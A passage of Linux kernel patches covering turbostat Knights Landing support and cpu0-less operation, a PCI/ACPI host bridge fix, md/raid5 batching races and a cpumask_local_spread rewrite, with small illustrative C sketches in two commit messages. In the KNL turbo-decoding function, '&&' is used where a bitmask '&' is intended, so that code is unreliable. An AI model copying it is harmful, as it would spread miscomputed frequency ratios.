0x%08llx\n", + msr); + + /** + * Turbo encoding in KNL is as follows: + * [7:0] -- Base value of number of active cores of bucket 1. + * [15:8] -- Base value of freq ratio of bucket 1. + * [20:16] -- +ve delta of number of active cores of bucket 2. + * i.e. active cores of bucket 2 = + * active cores of bucket 1 + delta + * [23:21] -- Negative delta of freq ratio of bucket 2. + * i.e. freq ratio of bucket 2 = + * freq ratio of bucket 1 - delta + * [28:24]-- +ve delta of number of active cores of bucket 3. + * [31:29]-- -ve delta of freq ratio of bucket 3. + * [36:32]-- +ve delta of number of active cores of bucket 4. 
+ * [39:37]-- -ve delta of freq ratio of bucket 4. + * [44:40]-- +ve delta of number of active cores of bucket 5. + * [47:45]-- -ve delta of freq ratio of bucket 5. + * [52:48]-- +ve delta of number of active cores of bucket 6. + * [55:53]-- -ve delta of freq ratio of bucket 6. + * [60:56]-- +ve delta of number of active cores of bucket 7. + * [63:61]-- -ve delta of freq ratio of bucket 7. + */ + cores = msr & 0xFF; + ratio = (msr >> 8) && 0xFF; + if (ratio > 0) + fprintf(stderr, + "%d * %.0f = %.0f MHz max turbo %d active cores\n", + ratio, bclk, ratio * bclk, cores); + + for (i = 16; i < 64; i = i + 8) { + delta_cores = (msr >> i) & 0x1F; + delta_ratio = (msr >> (i + 5)) && 0x7; + if (!delta_cores || !delta_ratio) + return; + cores = cores + delta_cores; + ratio = ratio - delta_ratio; + + /** -ve ratios will make successive ratio calculations + * negative. Hence return instead of carrying on. + */ + if (ratio > 0) + fprintf(stderr, + "%d * %.0f = %.0f MHz max turbo %d active cores\n", + ratio, bclk, ratio * bclk, cores); + } +} + static void dump_nhm_cst_cfg(void) { @@ -1788,6 +1853,21 @@ int has_hsw_turbo_ratio_limit(unsigned int family, unsigned int model) } } +int has_knl_turbo_ratio_limit(unsigned int family, unsigned int model) +{ + if (!genuine_intel) + return 0; + + if (family != 6) + return 0; + + switch (model) { + case 0x57: /* Knights Landing */ + return 1; + default: + return 0; + } +} static void dump_cstate_pstate_config_info(family, model) { @@ -1805,6 +1885,9 @@ dump_cstate_pstate_config_info(family, model) if (has_nhm_turbo_ratio_limit(family, model)) dump_nhm_turbo_ratio_limits(); + if (has_knl_turbo_ratio_limit(family, model)) + dump_knl_turbo_ratio_limits(); + dump_nhm_cst_cfg(); } @@ -1985,6 +2068,7 @@ rapl_dram_energy_units_probe(int model, double rapl_energy_units) case 0x3F: /* HSX */ case 0x4F: /* BDX */ case 0x56: /* BDX-DE */ + case 0x57: /* KNL */ return (rapl_dram_energy_units = 15.3 / 1000000); default: return (rapl_energy_units); @@ -2026,6 +2110,7 @@ void rapl_probe(unsigned int family, unsigned int model) case 0x3F: /* HSX */ case 0x4F: /* BDX */ case 0x56: /* BDX-DE */ + case 0x57: /* KNL */ do_rapl = RAPL_PKG | RAPL_DRAM | RAPL_DRAM_POWER_INFO | RAPL_DRAM_PERF_STATUS | RAPL_PKG_PERF_STATUS | RAPL_PKG_POWER_INFO; break; case 0x2D: @@ -2366,6 +2451,17 @@ int is_slm(unsigned int family, unsigned int model) return 0; } +int is_knl(unsigned int family, unsigned int model) +{ + if (!genuine_intel) + return 0; + switch (model) { + case 0x57: /* KNL */ + return 1; + } + return 0; +} + #define SLM_BCLK_FREQS 5 double slm_freq_table[SLM_BCLK_FREQS] = { 83.3, 100.0, 133.3, 116.7, 80.0}; @@ -2576,6 +2672,7 @@ void process_cpuid() do_c8_c9_c10 = has_hsw_msrs(family, model); do_skl_residency = has_skl_msrs(family, model); do_slm_cstates = is_slm(family, model); + do_knl_cstates = is_knl(family, model); bclk = discover_bclk(family, model); rapl_probe(family, model); From e9be7dd62899194ebdd90d417fc6c07d5d157912 Mon Sep 17 00:00:00 2001 From: Len Brown Date: Tue, 26 May 2015 12:19:37 -0400 Subject: [PATCH 329/872] tools/power turbostat: correctly decode of ENERGY_PERFORMANCE_BIAS When EPB is 0xF, turbosat was incorrectly describing it as "custom" instead of calling it "powersave": < cpu0: MSR_IA32_ENERGY_PERF_BIAS: 0x0000000f (custom) > cpu0: MSR_IA32_ENERGY_PERF_BIAS: 0x0000000f (powersave) Signed-off-by: Len Brown --- tools/power/x86/turbostat/turbostat.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/power/x86/turbostat/turbostat.c 
b/tools/power/x86/turbostat/turbostat.c index 256a5e1de381..f92211e9e70c 100644 --- a/tools/power/x86/turbostat/turbostat.c +++ b/tools/power/x86/turbostat/turbostat.c @@ -1919,7 +1919,7 @@ int print_epb(struct thread_data *t, struct core_data *c, struct pkg_data *p) if (get_msr(cpu, MSR_IA32_ENERGY_PERF_BIAS, &msr)) return 0; - switch (msr & 0x7) { + switch (msr & 0xF) { case ENERGY_PERF_BIAS_PERFORMANCE: epb_string = "performance"; break; From 7ce7d5de6dd08ee2a713ef13f4499073b4a72b7f Mon Sep 17 00:00:00 2001 From: Prarit Bhargava Date: Mon, 25 May 2015 08:34:28 -0400 Subject: [PATCH 330/872] tools/power turbostat: allow running without cpu0 Linux-3.7 added CONFIG_BOOTPARAM_HOTPLUG_CPU0, allowing systems to offline cpu0. But when cpu0 is offline, turbostat will not run: # turbostat ls turbostat: no /dev/cpu/0/msr This patch replaces the hard-coded use of cpu0 in turbostat with the current cpu, allowing it to run without a cpu0. Fewer cross-calls may also be needed due to use of current cpu, though this hard-coding was used only for the --debug preamble. Signed-off-by: Prarit Bhargava Signed-off-by: Len Brown --- tools/power/x86/turbostat/turbostat.c | 46 ++++++++++++++++++--------- 1 file changed, 31 insertions(+), 15 deletions(-) diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c index f92211e9e70c..68e77fdd4c04 100644 --- a/tools/power/x86/turbostat/turbostat.c +++ b/tools/power/x86/turbostat/turbostat.c @@ -92,6 +92,7 @@ unsigned int do_gfx_perf_limit_reasons; unsigned int do_ring_perf_limit_reasons; unsigned int crystal_hz; unsigned long long tsc_hz; +int base_cpu; #define RAPL_PKG (1 << 0) /* 0x610 MSR_PKG_POWER_LIMIT */ @@ -1154,7 +1155,7 @@ dump_nhm_platform_info(void) unsigned long long msr; unsigned int ratio; - get_msr(0, MSR_NHM_PLATFORM_INFO, &msr); + get_msr(base_cpu, MSR_NHM_PLATFORM_INFO, &msr); fprintf(stderr, "cpu0: MSR_NHM_PLATFORM_INFO: 0x%08llx\n", msr); @@ -1166,7 +1167,7 @@ dump_nhm_platform_info(void) fprintf(stderr, "%d * %.0f = %.0f MHz base frequency\n", ratio, bclk, ratio * bclk); - get_msr(0, MSR_IA32_POWER_CTL, &msr); + get_msr(base_cpu, MSR_IA32_POWER_CTL, &msr); fprintf(stderr, "cpu0: MSR_IA32_POWER_CTL: 0x%08llx (C1E auto-promotion: %sabled)\n", msr, msr & 0x2 ? 
"EN" : "DIS"); @@ -1179,7 +1180,7 @@ dump_hsw_turbo_ratio_limits(void) unsigned long long msr; unsigned int ratio; - get_msr(0, MSR_TURBO_RATIO_LIMIT2, &msr); + get_msr(base_cpu, MSR_TURBO_RATIO_LIMIT2, &msr); fprintf(stderr, "cpu0: MSR_TURBO_RATIO_LIMIT2: 0x%08llx\n", msr); @@ -1201,7 +1202,7 @@ dump_ivt_turbo_ratio_limits(void) unsigned long long msr; unsigned int ratio; - get_msr(0, MSR_TURBO_RATIO_LIMIT1, &msr); + get_msr(base_cpu, MSR_TURBO_RATIO_LIMIT1, &msr); fprintf(stderr, "cpu0: MSR_TURBO_RATIO_LIMIT1: 0x%08llx\n", msr); @@ -1253,7 +1254,7 @@ dump_nhm_turbo_ratio_limits(void) unsigned long long msr; unsigned int ratio; - get_msr(0, MSR_TURBO_RATIO_LIMIT, &msr); + get_msr(base_cpu, MSR_TURBO_RATIO_LIMIT, &msr); fprintf(stderr, "cpu0: MSR_TURBO_RATIO_LIMIT: 0x%08llx\n", msr); @@ -1309,7 +1310,7 @@ dump_knl_turbo_ratio_limits(void) int delta_ratio; int i; - get_msr(0, MSR_NHM_TURBO_RATIO_LIMIT, &msr); + get_msr(base_cpu, MSR_NHM_TURBO_RATIO_LIMIT, &msr); fprintf(stderr, "cpu0: MSR_NHM_TURBO_RATIO_LIMIT: 0x%08llx\n", msr); @@ -1365,7 +1366,7 @@ dump_nhm_cst_cfg(void) { unsigned long long msr; - get_msr(0, MSR_NHM_SNB_PKG_CST_CFG_CTL, &msr); + get_msr(base_cpu, MSR_NHM_SNB_PKG_CST_CFG_CTL, &msr); #define SNB_C1_AUTO_UNDEMOTE (1UL << 27) #define SNB_C3_AUTO_UNDEMOTE (1UL << 28) @@ -1694,8 +1695,10 @@ void turbostat_loop() void check_dev_msr() { struct stat sb; + char pathname[32]; - if (stat("/dev/cpu/0/msr", &sb)) + sprintf(pathname, "/dev/cpu/%d/msr", base_cpu); + if (stat(pathname, &sb)) if (system("/sbin/modprobe msr > /dev/null 2>&1")) err(-5, "no /dev/cpu/0/msr, Try \"# modprobe msr\" "); } @@ -1708,6 +1711,7 @@ void check_permissions() cap_user_data_t cap_data = &cap_data_data; extern int capget(cap_user_header_t hdrp, cap_user_data_t datap); int do_exit = 0; + char pathname[32]; /* check for CAP_SYS_RAWIO */ cap_header->pid = getpid(); @@ -1722,7 +1726,8 @@ void check_permissions() } /* test file permissions */ - if (euidaccess("/dev/cpu/0/msr", R_OK)) { + sprintf(pathname, "/dev/cpu/%d/msr", base_cpu); + if (euidaccess(pathname, R_OK)) { do_exit++; warn("/dev/cpu/0/msr open failed, try chown or chmod +r /dev/cpu/*/msr"); } @@ -1804,7 +1809,7 @@ int probe_nhm_msrs(unsigned int family, unsigned int model) default: return 0; } - get_msr(0, MSR_NHM_SNB_PKG_CST_CFG_CTL, &msr); + get_msr(base_cpu, MSR_NHM_SNB_PKG_CST_CFG_CTL, &msr); pkg_cstate_limit = pkg_cstate_limits[msr & 0xF]; @@ -2043,7 +2048,7 @@ double get_tdp(model) unsigned long long msr; if (do_rapl & RAPL_PKG_POWER_INFO) - if (!get_msr(0, MSR_PKG_POWER_INFO, &msr)) + if (!get_msr(base_cpu, MSR_PKG_POWER_INFO, &msr)) return ((msr >> 0) & RAPL_POWER_GRANULARITY) * rapl_power_units; switch (model) { @@ -2126,7 +2131,7 @@ void rapl_probe(unsigned int family, unsigned int model) } /* units on package 0, verify later other packages match */ - if (get_msr(0, MSR_RAPL_POWER_UNIT, &msr)) + if (get_msr(base_cpu, MSR_RAPL_POWER_UNIT, &msr)) return; rapl_power_units = 1.0 / (1 << (msr & 0xF)); @@ -2471,7 +2476,7 @@ double slm_bclk(void) unsigned int i; double freq; - if (get_msr(0, MSR_FSB_FREQ, &msr)) + if (get_msr(base_cpu, MSR_FSB_FREQ, &msr)) fprintf(stderr, "SLM BCLK: unknown\n"); i = msr & 0xf; @@ -2539,7 +2544,7 @@ int set_temperature_target(struct thread_data *t, struct core_data *c, struct pk if (!do_nhm_platform_info) goto guess; - if (get_msr(0, MSR_IA32_TEMPERATURE_TARGET, &msr)) + if (get_msr(base_cpu, MSR_IA32_TEMPERATURE_TARGET, &msr)) goto guess; target_c_local = (msr >> 16) & 0xFF; @@ -2913,13 +2918,24 @@ void 
setup_all_buffers(void) for_all_proc_cpus(initialize_counters); } +void set_base_cpu(void) +{ + base_cpu = sched_getcpu(); + if (base_cpu < 0) + err(-ENODEV, "No valid cpus found"); + + if (debug > 1) + fprintf(stderr, "base_cpu = %d\n", base_cpu); +} + void turbostat_init() { + setup_all_buffers(); + set_base_cpu(); check_dev_msr(); check_permissions(); process_cpuid(); - setup_all_buffers(); if (debug) for_all_cpus(print_epb, ODD_COUNTERS); From a68c7c3ff0469d79993ee85e8e0a3a9a568ce350 Mon Sep 17 00:00:00 2001 From: Len Brown Date: Wed, 27 May 2015 18:00:39 -0400 Subject: [PATCH 331/872] tools/power turbostat: update version number to 4.7 Signed-off-by: Len Brown --- tools/power/x86/turbostat/turbostat.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c index 68e77fdd4c04..323b65edfc97 100644 --- a/tools/power/x86/turbostat/turbostat.c +++ b/tools/power/x86/turbostat/turbostat.c @@ -3014,7 +3014,7 @@ int get_and_dump_counters(void) } void print_version() { - fprintf(stderr, "turbostat version 4.5 2 Apr, 2015" + fprintf(stderr, "turbostat version 4.7 27-May, 2015" " - Len Brown \n"); } From dc4fdaf0e4839109169d8261814813816951c75f Mon Sep 17 00:00:00 2001 From: "Rafael J. Wysocki" Date: Thu, 28 May 2015 01:39:53 +0200 Subject: [PATCH 332/872] PCI / ACPI: Do not set ACPI companions for host bridges with parents Commit 97badf873ab6 (device property: Make it possible to use secondary firmware nodes) uncovered a bug in the x86 (and ia64) PCI host bridge initialization code that assumes bridge->bus->sysdata to always point to a struct pci_sysdata object which need not be the case (in particular, the Xen PCI frontend driver sets it to point to a different data type). If it is not the case, an incorrect pointer (or a piece of data that is not a pointer at all) will be passed to ACPI_COMPANION_SET() and that may cause interesting breakage to happen going forward. To work around this problem use the observation that the ACPI host bridge initialization always passes NULL as parent to pci_create_root_bus(), so if pcibios_root_bridge_prepare() sees a non-NULL parent of the bridge, it should not attempt to set an ACPI companion for it, because that means that pci_create_root_bus() has been called by someone else. Fixes: 97badf873ab6 (device property: Make it possible to use secondary firmware nodes) Reported-and-tested-by: Sander Eikelenboom Signed-off-by: Rafael J. Wysocki Acked-by: Bjorn Helgaas --- arch/ia64/pci/pci.c | 13 ++++++++++--- arch/x86/pci/acpi.c | 13 ++++++++++--- 2 files changed, 20 insertions(+), 6 deletions(-) diff --git a/arch/ia64/pci/pci.c b/arch/ia64/pci/pci.c index d4e162d35b34..7cc3be9fa7c6 100644 --- a/arch/ia64/pci/pci.c +++ b/arch/ia64/pci/pci.c @@ -478,9 +478,16 @@ struct pci_bus *pci_acpi_scan_root(struct acpi_pci_root *root) int pcibios_root_bridge_prepare(struct pci_host_bridge *bridge) { - struct pci_controller *controller = bridge->bus->sysdata; - - ACPI_COMPANION_SET(&bridge->dev, controller->companion); + /* + * We pass NULL as parent to pci_create_root_bus(), so if it is not NULL + * here, pci_create_root_bus() has been called by someone else and + * sysdata is likely to be different from what we expect. Let it go in + * that case. 
+ */ + if (!bridge->dev.parent) { + struct pci_controller *controller = bridge->bus->sysdata; + ACPI_COMPANION_SET(&bridge->dev, controller->companion); + } return 0; } diff --git a/arch/x86/pci/acpi.c b/arch/x86/pci/acpi.c index d93963340c3c..14a63ed6fe09 100644 --- a/arch/x86/pci/acpi.c +++ b/arch/x86/pci/acpi.c @@ -482,9 +482,16 @@ struct pci_bus *pci_acpi_scan_root(struct acpi_pci_root *root) int pcibios_root_bridge_prepare(struct pci_host_bridge *bridge) { - struct pci_sysdata *sd = bridge->bus->sysdata; - - ACPI_COMPANION_SET(&bridge->dev, sd->companion); + /* + * We pass NULL as parent to pci_create_root_bus(), so if it is not NULL + * here, pci_create_root_bus() has been called by someone else and + * sysdata is likely to be different from what we expect. Let it go in + * that case. + */ + if (!bridge->dev.parent) { + struct pci_sysdata *sd = bridge->bus->sysdata; + ACPI_COMPANION_SET(&bridge->dev, sd->companion); + } return 0; } From 2b6b24574256c05be145936f1493aec74c6904e5 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Thu, 21 May 2015 15:10:01 +1000 Subject: [PATCH 333/872] md/raid5: ensure whole batch is delayed for all required bitmap updates. When we add a stripe to a batch, we need to be sure that head stripe will wait for the bitmap update required for the new stripe. Signed-off-by: NeilBrown --- drivers/md/raid5.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index b9f2b9cc6060..c55a68f37c72 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -837,6 +837,15 @@ static void stripe_add_to_batch_list(struct r5conf *conf, struct stripe_head *sh < IO_THRESHOLD) md_wakeup_thread(conf->mddev->thread); + if (test_and_clear_bit(STRIPE_BIT_DELAY, &sh->state)) { + int seq = sh->bm_seq; + if (test_bit(STRIPE_BIT_DELAY, &sh->batch_head->state) && + sh->batch_head->bm_seq > seq) + seq = sh->batch_head->bm_seq; + set_bit(STRIPE_BIT_DELAY, &sh->batch_head->state); + sh->batch_head->bm_seq = seq; + } + atomic_inc(&sh->count); unlock_out: unlock_two_stripes(head, sh); From d0852df543e5aa7db34c1ad26d053782bcbf48f1 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Wed, 27 May 2015 08:43:45 +1000 Subject: [PATCH 334/872] md/raid5: close race between STRIPE_BIT_DELAY and batching. When we add a write to a stripe we need to make sure the bitmap bit is set. While doing that the stripe is not locked so it could be added to a batch after which further changes to STRIPE_BIT_DELAY and ->bm_seq are ineffective. So we need to hold off adding to a stripe until bitmap_startwrite has completed at least once, and we need to avoid further changes to STRIPE_BIT_DELAY once the stripe has been added to a batch. If a bitmap_startwrite() completes after the stripe was added to a batch, it will not have set the bit, only incremented a counter, so no extra delay of the stripe is needed. 
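The locking pattern the patch relies on, publish a pending flag under the stripe lock, drop the lock for the blocking bitmap call, then re-check batch membership before setting the deferred state, can be sketched in a few lines of userspace C. Everything below is a simplified stand-in for the raid5 code (pthread mutex for the stripe lock, plain bools for the flag bits), not the kernel implementation:

#include <pthread.h>
#include <stdbool.h>
#include <stddef.h>

struct stripe {
    pthread_mutex_t lock;
    bool bitmap_pending;        /* stand-in for STRIPE_BITMAP_PENDING */
    bool bit_delay;             /* stand-in for STRIPE_BIT_DELAY */
    struct stripe *batch_head;  /* non-NULL once added to a batch */
};

/* While bitmap_pending is set, stripe_can_batch()-style checks must refuse
 * to add this stripe to a batch. */
static void add_write(struct stripe *sh, void (*bitmap_startwrite)(void))
{
    pthread_mutex_lock(&sh->lock);
    sh->bitmap_pending = true;     /* block batching before dropping the lock */
    pthread_mutex_unlock(&sh->lock);

    bitmap_startwrite();           /* may sleep, so it cannot run under the lock */

    pthread_mutex_lock(&sh->lock);
    sh->bitmap_pending = false;
    if (sh->batch_head == NULL)    /* a stripe batched meanwhile skips the delay */
        sh->bit_delay = true;
    pthread_mutex_unlock(&sh->lock);
}

static void fake_startwrite(void) { }

int main(void)
{
    struct stripe sh = { .lock = PTHREAD_MUTEX_INITIALIZER };

    add_write(&sh, fake_startwrite);
    return sh.bit_delay ? 0 : 1;
}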
Reported-by: Shaohua Li Signed-off-by: NeilBrown --- drivers/md/raid5.c | 25 ++++++++++++++++++++++--- drivers/md/raid5.h | 3 +++ 2 files changed, 25 insertions(+), 3 deletions(-) diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index c55a68f37c72..42d0ea6c8597 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -749,6 +749,7 @@ static void unlock_two_stripes(struct stripe_head *sh1, struct stripe_head *sh2) static bool stripe_can_batch(struct stripe_head *sh) { return test_bit(STRIPE_BATCH_READY, &sh->state) && + !test_bit(STRIPE_BITMAP_PENDING, &sh->state) && is_full_stripe_write(sh); } @@ -2996,14 +2997,32 @@ static int add_stripe_bio(struct stripe_head *sh, struct bio *bi, int dd_idx, pr_debug("added bi b#%llu to stripe s#%llu, disk %d.\n", (unsigned long long)(*bip)->bi_iter.bi_sector, (unsigned long long)sh->sector, dd_idx); - spin_unlock_irq(&sh->stripe_lock); if (conf->mddev->bitmap && firstwrite) { + /* Cannot hold spinlock over bitmap_startwrite, + * but must ensure this isn't added to a batch until + * we have added to the bitmap and set bm_seq. + * So set STRIPE_BITMAP_PENDING to prevent + * batching. + * If multiple add_stripe_bio() calls race here they + * much all set STRIPE_BITMAP_PENDING. So only the first one + * to complete "bitmap_startwrite" gets to set + * STRIPE_BIT_DELAY. This is important as once a stripe + * is added to a batch, STRIPE_BIT_DELAY cannot be changed + * any more. + */ + set_bit(STRIPE_BITMAP_PENDING, &sh->state); + spin_unlock_irq(&sh->stripe_lock); bitmap_startwrite(conf->mddev->bitmap, sh->sector, STRIPE_SECTORS, 0); - sh->bm_seq = conf->seq_flush+1; - set_bit(STRIPE_BIT_DELAY, &sh->state); + spin_lock_irq(&sh->stripe_lock); + clear_bit(STRIPE_BITMAP_PENDING, &sh->state); + if (!sh->batch_head) { + sh->bm_seq = conf->seq_flush+1; + set_bit(STRIPE_BIT_DELAY, &sh->state); + } } + spin_unlock_irq(&sh->stripe_lock); if (stripe_can_batch(sh)) stripe_add_to_batch_list(conf, sh); diff --git a/drivers/md/raid5.h b/drivers/md/raid5.h index 7dc0dd86074b..01cdb9f3a0c4 100644 --- a/drivers/md/raid5.h +++ b/drivers/md/raid5.h @@ -337,6 +337,9 @@ enum { STRIPE_ON_RELEASE_LIST, STRIPE_BATCH_READY, STRIPE_BATCH_ERR, + STRIPE_BITMAP_PENDING, /* Being added to bitmap, don't add + * to batch yet. + */ }; #define STRIPE_EXPAND_SYNC_FLAG \ From f36963c9d3f6f415732710da3acdd8608a9fa0e5 Mon Sep 17 00:00:00 2001 From: Rusty Russell Date: Sat, 9 May 2015 03:14:13 +0930 Subject: [PATCH 335/872] cpumask_set_cpu_local_first => cpumask_local_spread, lament da91309e0a7e (cpumask: Utility function to set n'th cpu...) created a genuinely weird function. I never saw it before, it went through DaveM. (He only does this to make us other maintainers feel better about our own mistakes.) cpumask_set_cpu_local_first's purpose is say "I need to spread things across N online cpus, choose the ones on this numa node first"; you call it in a loop. It can fail. One of the two callers ignores this, the other aborts and fails the device open. It can fail in two ways: allocating the off-stack cpumask, or through a convoluted codepath which AFAICT can only occur if cpu_online_mask changes. Which shouldn't happen, because if cpu_online_mask can change while you call this, it could return a now-offline cpu anyway. It contains a nonsensical test "!cpumask_of_node(numa_node)". This was drawn to my attention by Geert, who said this causes a warning on Sparc. It sets a single bit in a cpumask instead of returning a cpu number, because that's what the callers want. 
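The selection policy itself is small enough to model in ordinary C: wrap the index over the number of online CPUs, hand out the local node's CPUs first, then the remaining ones. The sketch below uses plain arrays in place of cpumasks and is only an illustration of the policy, not the kernel helper:

#include <stdio.h>

/* Pick the i'th CPU, local-node CPUs first, wrapping over all online CPUs. */
static int local_spread(unsigned int i, const int *local, int nlocal,
                        const int *online, int nonline)
{
    int idx = (int)(i % (unsigned int)nonline);   /* wrap: always return a cpu */

    if (idx < nlocal)
        return local[idx];                        /* local node first */
    idx -= nlocal;
    for (int j = 0; j < nonline; j++) {           /* then the non-local cpus */
        int cpu = online[j], is_local = 0;
        for (int k = 0; k < nlocal; k++)
            if (local[k] == cpu)
                is_local = 1;
        if (is_local)
            continue;
        if (idx-- == 0)
            return cpu;
    }
    return online[0];                             /* not reached */
}

int main(void)
{
    int local[] = { 0, 1 }, online[] = { 0, 1, 2, 3 };

    for (unsigned int i = 0; i < 6; i++)
        printf("queue %u -> cpu %d\n", i, local_spread(i, local, 2, online, 4));
    return 0;
}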
It could be made more efficient by passing the previous cpu rather than an index, but that would be more invasive to the callers. Fixes: da91309e0a7e8966d916a74cce42ed170fde06bf Signed-off-by: Rusty Russell (then rebased) Tested-by: Amir Vadai Acked-by: Amir Vadai Acked-by: David S. Miller --- drivers/net/ethernet/emulex/benet/be_main.c | 6 +- .../net/ethernet/mellanox/mlx4/en_netdev.c | 10 +-- drivers/net/ethernet/mellanox/mlx4/en_tx.c | 6 +- include/linux/cpumask.h | 6 +- lib/cpumask.c | 74 +++++++------------ 5 files changed, 37 insertions(+), 65 deletions(-) diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c index a6dcbf850c1f..6f9ffb9026cd 100644 --- a/drivers/net/ethernet/emulex/benet/be_main.c +++ b/drivers/net/ethernet/emulex/benet/be_main.c @@ -2358,11 +2358,11 @@ static int be_evt_queues_create(struct be_adapter *adapter) adapter->cfg_num_qs); for_all_evt_queues(adapter, eqo, i) { + int numa_node = dev_to_node(&adapter->pdev->dev); if (!zalloc_cpumask_var(&eqo->affinity_mask, GFP_KERNEL)) return -ENOMEM; - cpumask_set_cpu_local_first(i, dev_to_node(&adapter->pdev->dev), - eqo->affinity_mask); - + cpumask_set_cpu(cpumask_local_spread(i, numa_node), + eqo->affinity_mask); netif_napi_add(adapter->netdev, &eqo->napi, be_poll, BE_NAPI_WEIGHT); napi_hash_add(&eqo->napi); diff --git a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c index 32f5ec737472..cf467a9f6cc7 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c @@ -1501,17 +1501,13 @@ static int mlx4_en_init_affinity_hint(struct mlx4_en_priv *priv, int ring_idx) { struct mlx4_en_rx_ring *ring = priv->rx_ring[ring_idx]; int numa_node = priv->mdev->dev->numa_node; - int ret = 0; if (!zalloc_cpumask_var(&ring->affinity_mask, GFP_KERNEL)) return -ENOMEM; - ret = cpumask_set_cpu_local_first(ring_idx, numa_node, - ring->affinity_mask); - if (ret) - free_cpumask_var(ring->affinity_mask); - - return ret; + cpumask_set_cpu(cpumask_local_spread(ring_idx, numa_node), + ring->affinity_mask); + return 0; } static void mlx4_en_free_affinity_hint(struct mlx4_en_priv *priv, int ring_idx) diff --git a/drivers/net/ethernet/mellanox/mlx4/en_tx.c b/drivers/net/ethernet/mellanox/mlx4/en_tx.c index f7bf312fb443..7bed3a88579f 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_tx.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_tx.c @@ -144,9 +144,9 @@ int mlx4_en_create_tx_ring(struct mlx4_en_priv *priv, ring->queue_index = queue_index; if (queue_index < priv->num_tx_rings_p_up) - cpumask_set_cpu_local_first(queue_index, - priv->mdev->dev->numa_node, - &ring->affinity_mask); + cpumask_set_cpu(cpumask_local_spread(queue_index, + priv->mdev->dev->numa_node), + &ring->affinity_mask); *pring = ring; return 0; diff --git a/include/linux/cpumask.h b/include/linux/cpumask.h index 27e285b92b5f..59915ea5373c 100644 --- a/include/linux/cpumask.h +++ b/include/linux/cpumask.h @@ -151,10 +151,8 @@ static inline unsigned int cpumask_any_but(const struct cpumask *mask, return 1; } -static inline int cpumask_set_cpu_local_first(int i, int numa_node, cpumask_t *dstp) +static inline unsigned int cpumask_local_spread(unsigned int i, int node) { - set_bit(0, cpumask_bits(dstp)); - return 0; } @@ -208,7 +206,7 @@ static inline unsigned int cpumask_next_zero(int n, const struct cpumask *srcp) int cpumask_next_and(int n, const struct cpumask *, const struct cpumask *); int cpumask_any_but(const struct cpumask *mask, 
unsigned int cpu); -int cpumask_set_cpu_local_first(int i, int numa_node, cpumask_t *dstp); +unsigned int cpumask_local_spread(unsigned int i, int node); /** * for_each_cpu - iterate over every cpu in a mask diff --git a/lib/cpumask.c b/lib/cpumask.c index 830dd5dec40f..5f627084f2e9 100644 --- a/lib/cpumask.c +++ b/lib/cpumask.c @@ -139,64 +139,42 @@ void __init free_bootmem_cpumask_var(cpumask_var_t mask) #endif /** - * cpumask_set_cpu_local_first - set i'th cpu with local numa cpu's first - * + * cpumask_local_spread - select the i'th cpu with local numa cpu's first * @i: index number - * @numa_node: local numa_node - * @dstp: cpumask with the relevant cpu bit set according to the policy + * @node: local numa_node * - * This function sets the cpumask according to a numa aware policy. - * cpumask could be used as an affinity hint for the IRQ related to a - * queue. When the policy is to spread queues across cores - local cores - * first. + * This function selects an online CPU according to a numa aware policy; + * local cpus are returned first, followed by non-local ones, then it + * wraps around. * - * Returns 0 on success, -ENOMEM for no memory, and -EAGAIN when failed to set - * the cpu bit and need to re-call the function. + * It's not very efficient, but useful for setup. */ -int cpumask_set_cpu_local_first(int i, int numa_node, cpumask_t *dstp) +unsigned int cpumask_local_spread(unsigned int i, int node) { - cpumask_var_t mask; int cpu; - int ret = 0; - - if (!zalloc_cpumask_var(&mask, GFP_KERNEL)) - return -ENOMEM; + /* Wrap: we always want a cpu. */ i %= num_online_cpus(); - if (numa_node == -1 || !cpumask_of_node(numa_node)) { - /* Use all online cpu's for non numa aware system */ - cpumask_copy(mask, cpu_online_mask); + if (node == -1) { + for_each_cpu(cpu, cpu_online_mask) + if (i-- == 0) + return cpu; } else { - int n; - - cpumask_and(mask, - cpumask_of_node(numa_node), cpu_online_mask); - - n = cpumask_weight(mask); - if (i >= n) { - i -= n; - - /* If index > number of local cpu's, mask out local - * cpu's - */ - cpumask_andnot(mask, cpu_online_mask, mask); + /* NUMA first. */ + for_each_cpu_and(cpu, cpumask_of_node(node), cpu_online_mask) + if (i-- == 0) + return cpu; + + for_each_cpu(cpu, cpu_online_mask) { + /* Skip NUMA nodes, done above. */ + if (cpumask_test_cpu(cpu, cpumask_of_node(node))) + continue; + + if (i-- == 0) + return cpu; } } - - for_each_cpu(cpu, mask) { - if (--i < 0) - goto out; - } - - ret = -EAGAIN; - -out: - free_cpumask_var(mask); - - if (!ret) - cpumask_set_cpu(cpu, dstp); - - return ret; + BUG(); } -EXPORT_SYMBOL(cpumask_set_cpu_local_first); +EXPORT_SYMBOL(cpumask_local_spread); From b15a9dbdbfe72848b7ed4cd3f97fe80daaf99c89 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Fri, 22 May 2015 15:20:04 +1000 Subject: [PATCH 336/872] md/raid5: Ensure a batch member is not handled prematurely. If a stripe is a member of a batch, but not the head, it must not be handled separately from the rest of the batch. 'clear_batch_ready()' handles this requirement to some extent but not completely. If a member is passed to handle_stripe() a second time it returns '0' indicating the stripe can be handled, which is wrong. So add an extra test. 
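The rule the extra test enforces reduces to a one-line predicate. The toy model below only illustrates the head/member/lone distinction described above (as the check implies, a batch head's batch_head points back at itself); it is not the raid5 code:

#include <stdio.h>

struct stripe {
    struct stripe *batch_head;   /* NULL: lone; self: batch head; other: member */
};

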